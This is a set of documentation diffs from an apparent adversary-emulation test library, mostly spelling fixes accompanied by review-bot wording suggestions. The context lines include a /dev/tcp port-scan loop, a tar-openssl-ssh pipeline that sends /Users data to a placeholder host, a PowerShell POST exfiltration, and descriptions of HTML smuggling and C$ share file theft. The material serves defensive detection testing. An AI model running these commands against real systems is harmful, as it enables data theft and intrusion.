Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
**Supported Platforms:** Windows
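Review bot: the sentence at line 70 of the hunk is still ungrammatical after the "contained" fix: "The exe file that will be executed is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder" has two main verbs and no conjunction. Suggest "The executable that will be run, T1027.004_DynamicCompile.exe, is contained in the 'bin' folder of this atomic; its source code is in the 'src' folder."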
+1 -1
@@ -14,7 +14,7 @@ For example, JavaScript Blobs can be abused to dynamically generate malicious fi
<br/>
## Atomic Test #1 - HTML Smuggling Remote Payload
The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction.
The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without user interaction.
The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
**Supported Platforms:** Windows
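Review bot: "based off of the work from" on the line after the fixed one should be "based on the work of". Separately, the ISO link pins commit d0dad62…, so the payload will not follow later changes to T1553.005; if that is intentional for reproducibility, say so in the description, otherwise link the master path.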
+1 -1
@@ -343,7 +343,7 @@ https://wietze.github.io/blog/windows-command-line-obfuscation
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path/filename to save the dowloaded file to | path | Atomic-license.txt|
| local_path | Local path/filename to save the downloaded file to | path | Atomic-license.txt|
#### Run it with these steps!
1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename.
+4 -4
@@ -4,14 +4,14 @@
## Atomic Tests
- [Atomic Test #1 - Copy a sensitive File over Administive share with copy](#atomic-test-1---copy-a-sensitive-file-over-administive-share-with-copy)
- [Atomic Test #1 - Copy a sensitive File over Administrative share with copy](#atomic-test-1---copy-a-sensitive-file-over-administrative-share-with-copy)
- [Atomic Test #2 - Copy a sensitive File over Administive share with Powershell](#atomic-test-2---copy-a-sensitive-file-over-administive-share-with-powershell)
- [Atomic Test #2 - Copy a sensitive File over Administrative share with Powershell](#atomic-test-2---copy-a-sensitive-file-over-administrative-share-with-powershell)
<br/>
## Atomic Test #1 - Copy a sensitive File over Administive share with copy
## Atomic Test #1 - Copy a sensitive File over Administrative share with copy
Copy from sensitive File from the c$ of another LAN computer with copy cmd
https://twitter.com/SBousseaden/status/1211636381086339073
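Review bot: the title fix is correct, but the description under it is garbled and should be fixed in the same pass: "Copy from sensitive File from the c$ of another LAN computer with copy cmd" reads better as "Copy a sensitive file from the C$ administrative share of another LAN computer with the copy command". The bare Twitter URL should also be a markdown link like the references in other tests.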
@@ -73,7 +73,7 @@ Out-File -FilePath "\\#{remote}\C$\#{share_file}"
<br/>
<br/>
## Atomic Test #2 - Copy a sensitive File over Administive share with Powershell
## Atomic Test #2 - Copy a sensitive File over Administrative share with Powershell
Copy from sensitive File from the c$ of another LAN computer with powershell
https://twitter.com/SBousseaden/status/1211636381086339073
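Review bot: same description problem as Test #1: "Copy from sensitive File from the c$ of another LAN computer with powershell" should be "Copy a sensitive file from the C$ administrative share of another LAN computer with PowerShell". While the title is being edited, "Powershell" should be "PowerShell", the product's own spelling; the generated anchor will stay lowercase so no link changes.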
+1 -1
@@ -67,7 +67,7 @@ for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo po
## Atomic Test #2 - Port Scan Nmap
Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
**Supported Platforms:** Linux, macOS
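Review bot: "a single or range of addresses" should be "a single address or a range of addresses". The description also says sh will use nmap, telnet, and nc while the title says Nmap only; if the command really falls back to telnet or nc, state that explicitly, otherwise drop the two extra tools from the description.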
+1 -1
@@ -121,7 +121,7 @@ An adversary might use WMI to check if a certain Remote Service is running on a
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable"
if the provided remote host is unreacheable
if the provided remote host is unreachable
**Supported Platforms:** Windows
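Review bot: "a service information will be displayed" should be "service information will be displayed". The two quoted messages are punctuated inconsistently ("No instance(s) Available" is quoted on its own, while the RPC message runs into the next line with "Description =The"); quote both the same way and put a space after the equals sign so the text matches the wmic output a user will see.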
+1 -1
@@ -171,7 +171,7 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP
Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
**Supported Platforms:** Windows
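Review bot: the fixed line is still awkward: "send an email with attached file to exfiltrate to a remote address" reads better as "send an email, with the file to exfiltrate attached, to a remote address".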
+1 -1
@@ -96,7 +96,7 @@ tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{
<br/>
## Atomic Test #3 - DNSExfiltration (doh)
DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
!!! Test will fail without a domain under your control with A record and NS record !!!
See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
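Review bot: "allows for transferring (exfiltrate) a file" should be "allows transferring (exfiltrating) a file", and the second sentence repeats the first almost verbatim ("over a covert channel" twice); merge them into one, for example "DNSExfiltrator is a data leak testing tool that exfiltrates a file over a DNS request covert channel." The "!!! Test will fail …" warning and the bare GitHub URL would also be clearer as a bold sentence and a markdown link, matching the conventions used elsewhere in these docs.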